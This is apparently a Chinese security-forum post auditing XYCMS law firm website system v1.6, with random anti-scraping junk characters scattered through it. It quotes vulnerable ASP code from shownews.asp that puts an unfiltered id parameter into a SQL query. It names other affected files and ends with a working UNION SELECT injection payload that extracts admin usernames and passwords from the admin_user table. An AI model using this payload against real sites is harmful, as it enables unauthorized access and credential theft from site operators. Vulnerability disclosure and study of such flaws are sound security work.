前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
q; [8 H$ Y5 V! d! t/ S
i) y1 F5 F7 h2 D5 `淫荡分割线1 m3 ^6 r# {6 @& p3 C
--------------------------------------------------------; o, I! H8 m( x; x
& O1 j2 S0 u0 H
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)* z: A v( H# S. i% a1 c
源码地址:http://down.chinaz.com/soft/29233.htm# B8 J2 {* c( o, j' n" \
7 }! h, I6 u" [4 U漏洞文件:shownews.asp
# l @. A; N" X. `8 g漏洞代码:7-13行
8 P8 P& ]" G' ]* V! l l : E. K9 s5 ?: Z( Z
7 B4 v( q+ z3 |<%
# I/ d. g0 M* k, b) Mid=request.QueryString("id")
2 k3 l; ~8 L4 L5 H+ I* j; }
7 L1 @6 u9 W# H" O# s7 xset snews=server.createobject("adodb.recordset") C5 F' D0 G! }: R; i. m; \
exec="select * from [news] where id="&id
8 u" }: W4 H% I# W, |snews.open exec,conn,1,1( B7 r# a; Z0 Y% T3 z i' Z6 ?
%>
3 H, }* j% y8 s' z) h/ } 9 P% _: c1 E( C+ T+ b3 v/ |
( N7 D( Y8 z4 h' e) |1 C什么过滤都没有 直造成注入
. G3 g; ] H4 P4 k9 G0 R
' o, Z/ P( ?. C/ E8 ^& ?0 O" Y注入点:http://127.0.0.1:99/shownews.asp?id=xx
7 |3 ]4 A9 ^* }; i* ~5 p. F0 _ 4 a( p' M! j4 K @+ g2 @* }
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找& \8 i5 Z6 Q( x# G4 ^( G( L
) C* C5 |# i- t
- d6 r V% N" q. I7 p7 c; D2 q0 f
exp: union select 1,admin,password,4,5,7 from admin_user1 v$ s& N; n4 y" J
# y4 w' H1 u2 z$ Y# z$ c: Z |